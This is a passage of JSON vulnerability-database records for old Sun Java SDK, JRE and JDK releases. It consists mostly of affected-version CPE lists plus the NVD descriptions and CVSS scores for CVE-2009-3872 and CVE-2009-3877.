"cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update20:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Unspecified vulnerability in the JPEG JFIF Decoder in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to gain privileges via a crafted image file, aka Bug Id 6862969.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3872", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3872"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_01", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.3.1_6", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_04", "cpe:/a:sun:jre:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_10", "cpe:/a:sun:jre:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_8", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_12", "cpe:/a:sun:sdk:1.3.1_5", "cpe:/a:sun:jre:1.4.2_02", "cpe:/a:sun:jre:1.3.1_06", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_21", "cpe:/a:sun:jre:1.3.1_18", "cpe:/a:sun:jre:1.3.1_3", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jre:1.4.2_03", "cpe:/a:sun:jre:1.3.1_9", "cpe:/a:sun:jre:1.4.2_07", "cpe:/a:sun:jre:1.3.1_19", "cpe:/a:sun:jre:1.3.1_5", "cpe:/a:sun:jre:1.3.1_09", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.3.1_17", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:jre:1.3.1_01", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.3.1_25", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:sdk:1.3.1_07", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2009-3872", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3872", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_19:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_21:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_23:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_20:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_06:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_04:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_24:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_01a:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_25:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_18:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_21:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_19:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_17:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_05:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:40:06", "description": "Unspecified vulnerability in Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and JRE 6 before Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows remote attackers to cause a denial of service (memory consumption) via crafted HTTP headers, which are not properly parsed by the ASN.1 DER input stream parser, aka Bug Id 6864911.", "edition": 6, "cvss3": {}, "published": "2009-11-05T16:30:00", "title": "CVE-2009-3877", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3877"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:sun:sdk:1.3.1_15", "cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:sdk:1.4.2_23", "cpe:/a:sun:jre:1.3.1_8", "cpe:/a:sun:sdk:1.3.1_16", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:sdk:1.3.1_13", "cpe:/a:sun:jre:1.3.1_7", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:sdk:1.3.1_02", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_05", "cpe:/a:sun:jre:1.3.1_08", "cpe:/a:sun:sdk:1.3.1_19", "cpe:/a:sun:jre:1.3.1_23", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.3.1_04", "cpe:/a:sun:sdk:1.3.1_3", "cpe:/a:sun:sdk:1.3.1_06", "cpe:/a:sun:jre:1.4.2_06", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:sdk:1.4.2_03", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.3.1_01a", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_19", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:sdk:1.3.1_20", "cpe:/a:sun:jre:1.3.1_14", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:sdk:1.3.1_23", "cpe:/a:sun:sdk:1.3.1_21", "cpe:/a:sun:jre:1.3.1_07", "cpe:/a:sun:sdk:1.3.1_04", "cpe:/a:sun:jre:1.3.1_12", "cpe:/a:sun:jre:1.4.2_04", "cpe:/a:sun:sdk:1.4.2_06", "cpe:/a:sun:sdk:1.3.1_09", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_01", "cpe:/a:sun:sdk:1.3.1_2", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.3.1_17", "cpe:/a:sun:sdk:1.3.1_24", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.3.1_1", "cpe:/a:sun:jre:1.3.1_21", "cpe:/a:sun:jre:1.3.1_15", "cpe:/a:sun:sdk:1.3.1_03", "cpe:/a:sun:sdk:1.3.1_6", "cpe:/a:sun:jre:1.3.1_02", "cpe:/a:sun:sdk:1.4.2_09", "cpe:/a:sun:sdk:1.3.1_01a", "cpe:/a:sun:sdk:1.3.1_11", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.3.1_22", "cpe:/a:sun:sdk:1.4.2_07", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:sdk:1.3.1_9", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:sdk:1.4.2_20", "cpe:/a:sun:sdk:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_7", "cpe:/a:sun:jre:1.3.1_11", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jre:1.3.1_16", "cpe:/a:sun:jre:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_08", "cpe:/a:sun:jre:1.3.1_20", "cpe:/a:sun:jre:1.3.1_2", "cpe:/a:sun:sdk:1.4.2_22", "cpe:/a:sun:sdk:1.3.1_01", "cpe:/a:sun:jre:1.3.1_10", "cpe:/a:sun:sdk:1.3.1_18", "cpe:/a:sun:sdk:1.3.1_14", "cpe:/a:sun:jre:1.4.2_08", "cpe:/a:sun:sdk:1.3.1_4", "cpe:/a:sun:sdk:1.4.2_02", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:sdk:1.3.1_08", "cpe:/a:sun:jre:1.3.1_24", "cpe:/a:sun:jre:1.3.1_13", "cpe:/a:sun:jre:1.3.1_05", "cpe:/a:sun:sdk:1.3.1_25", "cpe:/a:sun:jre:1.4.2_05", "cpe:/a:sun:jre:1.4.2_15", 